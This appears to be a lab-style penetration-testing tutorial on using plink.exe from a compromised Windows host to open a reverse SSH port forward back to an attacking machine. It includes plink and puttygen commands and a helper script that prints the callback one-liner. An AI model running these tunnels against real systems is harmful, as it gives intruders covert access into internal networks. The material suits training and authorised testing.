plink

Plink.exe is a Windows command line version of the PuTTY SSH client

Now that Windows ships with its own built-in OpenSSH client, plink is less useful against modern targets; it is still a very handy tool, however, so we will cover it here.

Windows targets are unlikely to have an SSH server running, so our use of Plink tends to be a case of transporting the binary to the target and then using it to create a reverse connection back to our attacking machine. As with OpenSSH, the -R option sets up the reverse port forward. This would be done with the following command:
cmd.exe /c echo y | .\plink.exe -R LOCAL_PORT:TARGET_IP:TARGET_PORT USERNAME@ATTACKING_IP -i KEYFILE -N

Notice that this syntax is nearly identical to the one we used previously with the standard OpenSSH client. The cmd.exe /c echo y at the start is for non-interactive shells (like most reverse shells, with Windows shells being difficult to stabilise): it pipes a "y" into plink to get past the prompt warning that the target has not connected to this host before. Be aware that this accepts whatever host key is presented without checking it. If there is any chance the connection back could be intercepted, recent plink versions can instead pin the attacking machine's host key fingerprint with the -hostkey option and run with -batch, which disables interactive prompts altogether.

To use our example from before, if we have access to 172.16.0.5 and would like to forward a connection to 172.16.0.10:80 back to port 8000 on our own attacking machine (172.16.0.20), we could use this command:
cmd.exe /c echo y | .\plink.exe -R 8000:172.16.0.10:80 kali@172.16.0.20 -i KEYFILE -N
As with OpenSSH reverse forwards, port 8000 is opened on the attacking machine's loopback interface only, unless the SSH server there has GatewayPorts enabled.

Note that keys generated by ssh-keygen are in OpenSSH format and will not work here: plink's -i option expects PuTTY's own .ppk format. You will need to convert them using the puttygen tool, which can be installed on Kali using sudo apt install putty-tools. Once installed, conversion can be done with:
puttygen KEYFILE -o OUTPUT_KEY.ppk
substituting the path to the private key for KEYFILE and choosing a name for the output file.

The resulting .ppk file can then be transferred to the Windows target and used in exactly the same way as with the reverse port forwarding taught in the previous task. Conversion changes only the file format, not the key pair itself, so the converted private key still authenticates against the same public key we added to the authorized_keys file before.
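To tie the steps above together, here is an added helper script written for this page (it is not PuTTY's own tooling and not from the original tutorial) that runs on the Kali side: it converts the key with puttygen when it is not already a .ppk, checks the result really is a PuTTY key file, validates the addresses and ports, and prints the exact line to paste into the Windows shell. It assumes puttygen from putty-tools is installed and that, when a fingerprint is passed, the plink on the target is recent enough to accept the -hostkey option; the -hostkey/-batch variant is a plink feature the page itself does not cover, and the key file names and fingerprint in the usage comment are placeholders.

```shell
#!/bin/sh
# Added helper for this page (not from PuTTY or the original tutorial).
# Runs on the attacking (Kali) box: converts the key if needed, checks it is a
# .ppk, validates inputs and prints the plink one-liner for the Windows target.
# Assumes: puttygen from putty-tools is installed; if a host-key fingerprint is
# supplied, the target's plink is recent enough to accept -hostkey.
set -eu

# TCP port: digits only, 1-65535.
is_port() {
    case $1 in ''|*[!0-9]*) return 1 ;; esac
    [ ${#1} -le 5 ] && [ "$1" -ge 1 ] && [ "$1" -le 65535 ]
}

# Dotted-quad IPv4: exactly four numeric octets, each 0-255.
is_ipv4() {
    old_ifs=$IFS
    IFS=.
    set -- $1
    IFS=$old_ifs
    [ $# -eq 4 ] || return 1
    for octet in "$@"; do
        case $octet in ''|*[!0-9]*) return 1 ;; esac
        [ ${#octet} -le 3 ] && [ "$octet" -le 255 ] || return 1
    done
}

# A PuTTY private key starts with "PuTTY-User-Key-File-"; an OpenSSH key does not.
is_ppk() {
    first_line=
    [ -r "$1" ] || return 1
    IFS= read -r first_line < "$1" || true
    case $first_line in
        PuTTY-User-Key-File-*) return 0 ;;
        *) return 1 ;;
    esac
}

# Convert an OpenSSH private key to .ppk with puttygen (the page's conversion
# step); copy it through unchanged if it already is a .ppk.
to_ppk() {
    if is_ppk "$1"; then
        cp "$1" "$2"
        return 0
    fi
    command -v puttygen >/dev/null 2>&1 ||
        { echo 'puttygen not found: sudo apt install putty-tools' >&2; return 1; }
    puttygen "$1" -o "$2"
}

# Print the command typed on the Windows target.
#   $1 local_port   port that will listen on the ATTACKING machine
#   $2 target_ip    host the forwarded traffic is delivered to (as seen from the target)
#   $3 target_port  port on that host
#   $4 user, $5 attacker_ip, $6 keyfile (.ppk, as named on the target)
#   $7 fingerprint  optional attacker host-key fingerprint; when given, the key
#                   is pinned with -hostkey and -batch instead of piping "y"
#                   into the unknown-host prompt, which accepts any key.
plink_reverse_cmd() {
    is_port "$1" && is_port "$3" || { echo "bad port: $1 / $3" >&2; return 1; }
    is_ipv4 "$2" && is_ipv4 "$5" || { echo "bad IPv4 address: $2 / $5" >&2; return 1; }
    fwd="-R $1:$2:$3 $4@$5 -i $6 -N"
    if [ -n "${7:-}" ]; then
        printf '.\\plink.exe -batch -hostkey %s %s\n' "$7" "$fwd"
    else
        printf 'cmd.exe /c echo y | .\\plink.exe %s\n' "$fwd"
    fi
}

# Usage (on Kali), placeholders for the key names and fingerprint:
#   sh prep_plink.sh id_ed25519 key.ppk 8000 172.16.0.10 80 kali 172.16.0.20 [FINGERPRINT]
if [ $# -ge 7 ]; then
    to_ppk "$1" "$2"
    is_ppk "$2" || { echo "$2 is not a .ppk file" >&2; exit 1; }
    plink_reverse_cmd "$3" "$4" "$5" "$6" "$7" "$(basename "$2")" "${8:-}"
fi
```

The script only prints the command; the .ppk and plink.exe still have to be transferred to the target by whatever means the engagement allows. Run with the example values from this page it prints the same one-liner shown above, and with a fingerprint as the eighth argument it prints the pinned -hostkey form instead.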

Note: Plink is notorious for going out of date quickly, which often results in failing to connect back, usually because an old plink no longer shares a key exchange or host key algorithm with a current OpenSSH server. Always make sure you have an up to date version of the .exe. Whilst there is a copy pre-installed on Kali at /usr/share/windows-resources/binaries/plink.exe, downloading a fresh copy from the official PuTTY site before a new engagement is sensible.
